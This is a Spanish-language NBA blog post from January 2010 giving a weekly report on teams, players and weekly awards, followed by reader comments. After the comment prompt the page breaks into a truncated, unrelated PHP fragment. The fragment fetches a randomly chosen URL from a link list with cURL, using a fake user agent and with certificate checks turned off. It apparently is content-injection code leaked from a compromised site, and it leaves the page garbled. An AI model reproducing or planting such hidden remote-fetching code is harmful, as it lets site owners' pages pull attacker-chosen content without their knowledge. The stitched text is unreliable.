Informe Semanal #11

11 de January de 2010 por TheDeerHunter

¿Porqué todos los jugones sonríen igual?

Va de jugones, en el más estricto sentido de la palabra. El equipo más en forma de la liga son los Hornets de Chris Paul. Tras 6 victorias consecutivas, casi todas sufriendo lo indecible, marcan 19-16 que no les sirve para alcanzar plaza de playoffs. En otra conferencia serían quintos. ¿Las claves de la recuperación? Devin Brown ha experimentado un interesante salto cualitativo y parece que se están recuperando a David West, Stojakovic, Okafor y Posey para la causa. Suficiente para mejorar algo ofensivamente, aunque les quede mucho camino para volver a ser un equipo serio. Será que no están tan encabronados como con Scott.

Los otros ganadores son los Clippers, que mejoran en la misma medida que Baron Davis recupera sensaciones. Algunos creemos que es equipo de playoffs a poco que Blake sea algo parecido a lo que se espera de él.

Ganarás el pan con el sudor de tu frente

Momento raro. Los equipos grandes velan armas antes del All-Stars que suele ser el pistoletazo de salida para lo que realmente va en serio. No sabemos si la palabra “sudar” casa realmente con ellos…

Cleveland, los más en forma de los gallos, palmó frente a unos Denver sin Carmelo que tampoco están para tirar cohetes. Los Celtics, sin Garnett, hicieron los propio contra los peores Hawks en tiempo. Estos, a su vez, han hecho el ridículo en Miami y Orlando recientemente… dos equipos que no se sabe muy bien a lo que juegan. Ya ni hablemos de Toronto que parece que están ahí en el 50% viviendo más cómodos que nadie…

Los Lakers, sin Gasol y Artest en estado de “p’habernos matao” por momentos dan risa con su defensa. Los Mavs, que deberían haber aprovechado el contexto, por momentos han dado pena. Los Spurs han salvado otra racha “horriblis” con su “regalada” victoria contra los Nets y a los Suns no hay dios que no les meta más de 100 puntos…

Sólo se adivina esfuerzo en las zonas de fricción por entrar en playoffs. En el Este sí se aprecia el esfuerzo de Bobcats, Bucks (¿nueva lesión de Michael Redd mediante?) e incluso Knicks. El Wild Wild West es de los Thunder, los Blazers, los Rockets, Jazz o Grizzlies… que evidentemente sudan cada victoria que logran.

Se dejaban llevar

Diría que, más allá de resultados, no es un buen calificativo para los Kings. Quien los haya visto jugar sabe que Tyreke y los suyos para nada se dejan llevar. Un punto de calidad sí necesitan… y se puede creer que Kevin Martin o bien un traspaso que le incluya podría dárselo. Deberían hacer algo antes de que queden descolgados por completo.

Los Bulls vuelven a desfogarse tras el arreón reciente. Quedan bastante descolgados de la lucha los Wizards, Pacers, Sixers, Warriors y también Wolves. Es cada vez más fácil que terminen dejándose llevar definitivamente.

El carabasas club

Pensábamos que la recuperación de algunas piezas permitiría recuperarse de su mala racha a los Pistons. Todo lo contrario. Casi revuelve el estómago ver jugar ahora a alguno de los ilustres de este equipo.

Los Nets se mantienen en números para lograr, para el final de temporada, el exigente objetivo que se han marcado: pasar de las 5 victorias.

PREMIOS SEMANALES:

MVP: Precísamente hemos tenido la suerte de verlo en abierto esta semana, machacándole los higadillos a Artest&Kobe o quien se le pusiera por delante. Los resultados colectivos no le han acompañado más allá de ese partido, pero 31 puntos, 6 asistencias, 4 rebotes de promedio en los partidos que ha disputado bien merecen un MVP semanal. Hablamos, como no, de Brandon Roy.

El rookie: Tampoco le han acompañado los resultados, pero hablar de rookie ahora mismo no puede ser otra cosa que hablar de Tyreke Evans. 26 puntos por partido, 6 asistencias y 5 rebotes… añadiendo un buzzer beater genial a su currículum semanal.

La sorpresa: La mayor sorpresa de la semana fue el baño que le dió Roy Hibbert a Dwight Howard el martes pasado. Un pívot muy a tener en cuenta a medio plazo.

La decepción: Con Richard Hamilton, Tayshaun Prince, Rodney Stuckey, Ben Gordon, Charlie Villanueva, Jason Maxiell… hace daño a la vista ver a Detroit con 12 derrotas seguidas (y subiendo)

Comenta

5 comentarios a esta entrada

  1. NBA LAKERS BLOG dice:
    #1

    Excelente el informe… es muy cierto lo que dices al principio: cerca del All-Star, cuando todos tendrían que empezar a preparar cañones para lo que realmente empieza, los equipos ‘grandes’ están cayendo en su juego y los que pelean por entrar a Playoffs dan todos de sí como si fueran los últimos cinco partidos de la temporada. Admirable… lo de la NBA.

    Te espero en nuestro blog de los Lakers 😉

    Un saludo!

    –NM–

      Citar

  2. sergio dice:
    #2

    Noticia del dia: Record de Bargnani en rebotes con 17. El anterior estaba en 12!! Algo muy triste para un pivot que juega de media 34 minutos ¬¬

      Citar

  3. couxe dice:
    #3

    Más triste si cabe es que un tío de 1,83 y que juega de base como Chris Paul promedie en su carrera más rebotes que un 2,13 como Bargiani…
    Un buen dato para comprobar lo que se consigue a través de la actitud y a la intensidad a la hora de jugar…

      Citar

  4. sergio dice:
    #4

    Rondo, Arenas, Jack y Baron Davis se quedan cerca, Kidd le saca 2 por partido, Westbrook tambien va por encima, Shannon Brown lleva practicamente el mismo porcentaje por minuto,…

    Por cierto, alguien se ha dado cuenta de que sale Sergi Vidal (y Prigioni,…..) como jugador en la pagina de la NBA??… en la pestaña Players.

      Citar

  5. xapa_croack dice:
    #5

    Pues kaman y lebron premios semanales

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>